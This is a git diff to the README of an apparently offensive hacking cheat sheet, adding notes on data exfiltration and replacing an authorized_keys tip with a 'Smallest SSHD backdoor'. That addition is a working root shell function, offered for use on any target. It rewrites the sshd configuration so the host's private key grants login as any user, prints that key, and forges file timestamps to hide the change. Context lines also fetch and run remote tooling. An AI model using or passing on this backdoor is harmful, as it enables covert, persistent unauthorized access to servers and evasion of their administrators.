Merge branch 'master' of github.com:hackerschoice/thc-tips-tricks-hacks-cheat-sheet

README.md

@@ -73,7 +73,7 @@ Got tricks? Join us [https://thc.org/ops](https://thc.org/ops)
 1. [Backdoors](#backdoor)
    1. [gs-netcat](#gsnc)
    2. [sshx.io](#sshx)
-   1. [authorized_keys](#backdoor-auth-keys)
+   1. [Smallest SSHD backdoor](#backdoor-sshd)
    1. [Remote access an entire network](#backdoor-network)
    1. [Smallest PHP backdoor](#php-backdoor)
    1. [Smallest reverse DNS-tunnel backdoor](#reverse-dns-backdoor)
@@ -1086,6 +1086,11 @@ nmap -p80 --script http-brute --script-args \
 ---
 <a id="exfil"></a>
 ## 4. Data Upload/Download/Exfil
+
+Easiest: Type `exfil` on a [Segfault Root Server](https://thc.org/segfault)
+
+Or use curl and run your own [PHP exfil server](https://github.com/Rouji/single_php_filehost).
+
 <a id="file-encoding"></a>
 
 ### 4.i File Encoding
@@ -1797,23 +1802,43 @@ curl -SsfL https://s3.amazonaws.com/sshx/sshx-$(uname -m)-unknown-linux-musl.tar
 for _ in {1..10}; do [ -s .u ] && break;sleep 1;done;cat .u;rm -f .u .s;
 ```
 
-<a id="backdoor-auth-keys"></a>
-**6.iii. authorized_keys**
+<a id="backdoor-sshd"></a>
+**6.iii. Smallest SSHD backdoor**
 
-Add your ssh public key to */root/.ssh/authorized_keys*. It's the most reliable backdoor ever :>
+- Survives `apt update`
+- Does not create any new file.
+- Does not use `authorized_keys` or PAM.
 
-* It survives reboots.
-* It even survives re-installs. Admins have been known to make a backup of authorized_keys and then put it straight back onto the newly installed system.
-* We have even seen our key being copied to other companies!
+Adding your key to *authorized_keys* is overused 😩. Instead, as root, cut & paste this _once_ on any target. It will add a single line to SSHD's config and allow you to log in forever:
 
-Tip: Change the name at the end of the ssh public keyfile to something obscure like *backup@ubuntu* or the admin's real name:
-```
-$ cat id_rsa.pub
-ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCktFkgm40GDkqYwJkNZVb+NLqYoUNSPVPLx0VDbJM0
-[...]
-u1i+MhhnCQxyBZbrWkFWyzEmmHjZdAZCK05FRXYZRI9yadmvo7QKtRmliqABMU9WGy210PTOLMltbt2C
-c3zxLNse/xg0CC16elJpt7IqCFV19AqfHnK4YiXwVJ+M+PyAp/aEAujtHDHp backup@ubuntu
+```shell
+backdoor_sshd() {
+	local B="/etc/ssh"
+	local K="${B}/ssh_host_ed25519_key" D="${B}/sshd_config.d"
+	local N=$(cd "${D}" 2>/dev/null|| exit; shopt -s nullglob; echo *.conf)
+	[ -n "$N" ] && N="${N%%\.conf*}.conf"
+	N="${D}/${N:-50-cloud-init.conf}"
+	[ ! -d "${D}" ] && N="${B}/sshd_config"
+	{ [ ! -f "$K" ] || [ ! -f "$K".pub ]; } && return
+	grep -iqm1 '^PermitRootLogin\s\+no' "${B}/sshd_config" && echo >&2 "WARN: PermitRootLogin blocking in sshd_config"
+	echo -e "\e[0;31mYour id_ed25519 to log in to this server as any user:\e[0;33m\n$(cat "${K}")\e[0m"
+	grep -qm1 '^AuthorizedKeysFile' "$N" 2>/dev/null && { echo >&2 "WARN: Already backdoored"; return; }
+	echo -e "AuthorizedKeysFile\t.ssh/authorized_keys .ssh/authorized_keys2 ${K}.pub" >>"${N}" || return
+	touch -r "$K" "$N" "$D" \
+	&& declare -f ctime >/dev/null && ctime "$N" "$D"
+	systemctl restart ssh
+}
+backdoor_sshd
 ```
+
+How it works:
+- The SSHD host key is just an ordinary ed25519 key.
+- Any ed25519 key can be used to authenticate a user.
+- SSHD checks `~/.ssh/authorized_keys` (but this trick has been overused).
+- Instead, configure SSHD to also check `/etc/ssh/sshd_host_ed25519_key.pub` for login-authentication-keys.
+- SSHD will now check `~/.ssh/authorized_keys` _and_ `/etc/ssh/ssh_host_ed25519_key.pub` for valid login keys.
+- Use the `/etc/ssh/sshd_host_ed25519_key` secret key to log in to the target.
+
 <a id="backdoor-network"></a>
 **6.vi. Remote Access to an entire network**